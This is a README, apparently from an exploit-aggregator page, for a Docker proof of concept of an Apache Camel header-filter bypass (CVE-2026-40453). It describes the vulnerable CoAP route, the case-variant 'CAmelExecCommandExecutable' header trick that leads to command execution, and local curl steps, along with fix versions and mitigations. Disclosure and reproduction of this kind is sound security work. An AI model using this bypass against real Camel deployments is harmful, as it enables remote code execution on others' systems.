## https://sploitus.com/exploit?id=D3379F17-C9FD-5588-8FB8-4A7C177A58EF
# Case-Variant Camel Header Injection Reproducer (CVE-2026-40453)
This project demonstrates **CVE-2026-40453** โ an incomplete fix for **CVE-2025-27636**. The 2025 fix
added `setLowerCase(true)` to `HttpHeaderFilterStrategy` so that case-variant header names (e.g.
`CAmelExecCommandExecutable`) are filtered alongside the canonical `CamelExecCommandExecutable`. The
same call was **not** applied to five non-HTTP `HeaderFilterStrategy` implementations
(`camel-jms`, `camel-sjms`, `camel-coap`, `camel-google-pubsub`), which filter case-sensitively while
the Camel Exchange stores headers in a case-**insensitive** map. An attacker can therefore inject a
case-variant `Camel*` control header that bypasses the filter but is still resolved by downstream
components (`camel-exec`, `camel-file`, ...) under its canonical name โ **remote code execution** /
arbitrary file write.
This reproducer demonstrates the bypass with **camel-coap** (self-contained, no external broker); the
same flaw affects the JMS/SJMS/Google-Pubsub strategies.
Advisory: https://camel.apache.org/security/CVE-2026-40453.html
## Vulnerability Summary
| Property | Value |
|----------|-------|
| **Components** | `camel-jms`, `camel-sjms`, `camel-coap`, `camel-google-pubsub` (this PoC uses camel-coap) |
| **Affected Classes** | `JmsHeaderFilterStrategy`, `ClassicJmsHeaderFilterStrategy`, `SjmsHeaderFilterStrategy`, `CoAPHeaderFilterStrategy`, `GooglePubsubHeaderFilterStrategy` |
| **Root cause** | Case-sensitive `startsWith("Camel"/"camel")` filtering (missing `setLowerCase(true)`) vs a case-insensitive Exchange header map |
| **CWE** | CWE-20 (Improper Input Validation) โ message header injection |
| **Impact** | RCE / arbitrary file write via header-driven producers |
| **Affected Versions** | From 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0 |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.20.0 |
| **JIRA** | CAMEL-23313 (completes the fix for CVE-2025-27636) |
| **Reporter** | Saroj Khadka |
## Technical Details
`CoAPHeaderFilterStrategy` (affected version) filters `Camel*` **case-sensitively**:
```java
public CoAPHeaderFilterStrategy() {
setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
// MISSING: setLowerCase(true);
}
```
When a CoAP request arrives, `CamelCoapResource.handleRequest()` maps each URI-query parameter into the
Exchange In headers, gated by `strategy.applyFilterToExternalHeaders(name, value, exchange)`:
- `CamelExecCommandExecutable` โ `startsWith("Camel")` is **true** โ filtered out.
- `CAmelExecCommandExecutable` โ `startsWith("Camel")` is **false** (`CAm` โ `Cam`) โ **not** filtered.
The Exchange header map is case-**insensitive**, so the case-variant header is later resolved by the
exec producer under its canonical name `CamelExecCommandExecutable`, overriding the command.
## The victim route
```java
from("coap://0.0.0.0:5683/run")
.to("exec:echo?args=hello")
.convertBodyTo(String.class);
```
## Prerequisites
- Java 17+ and Maven 3.8+
- Docker
## Reproduction Steps
```bash
mvn clean package -DskipTests
docker compose up -d --build
```
### 1) Benign
```bash
curl http://localhost:8080/exploit/normal # -> hello
```
### 2) Canonical header โ FILTERED (no RCE)
```bash
curl http://localhost:8080/exploit/canonical
# injects CamelExecCommandExecutable / CamelExecCommandArgs
# -> /tmp/pwned-canonical created: false (the filter strips canonical Camel* headers)
```
### 3) Case-variant header โ BYPASS (RCE)
```bash
curl http://localhost:8080/exploit/attack
# injects CAmelExecCommandExecutable / CAmelExecCommandArgs (capital A)
# -> /tmp/pwned created: true (case-variant bypasses the case-sensitive filter)
docker exec cve-2026-40453 ls -la /tmp/pwned
```
### Cleanup
```bash
docker compose down
```
## Recommended Fix
Upgrade to 4.14.6 / 4.18.2 / 4.20.0. The fix (CAMEL-23313) adds `setLowerCase(true)` to the five
non-HTTP `HeaderFilterStrategy` implementations so case-variant `Camel*` names are also filtered.
## Mitigation
Until upgrading:
1. **Strip Camel headers case-insensitively** downstream of untrusted producers โ a custom
`HeaderFilterStrategy` with `setLowerCase(true)`, or `removeHeaders` with a case-insensitive pattern.
2. Avoid forwarding untrusted JMS / CoAP / Pub-Sub messages into header-driven producers.
## Files
```
CVE-2026-40453/
โโโ pom.xml
โโโ Dockerfile
โโโ docker-compose.yml
โโโ README.md
โโโ src/main/
โโโ java/com/example/
โ โโโ Application.java
โ โโโ CoapExecRoute.java # victim: from(coap).to(exec)
โ โโโ ExploitController.java # /normal, /canonical (filtered), /attack (case-variant bypass)
โโโ resources/
โโโ application.properties
```
## Disclaimer
This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.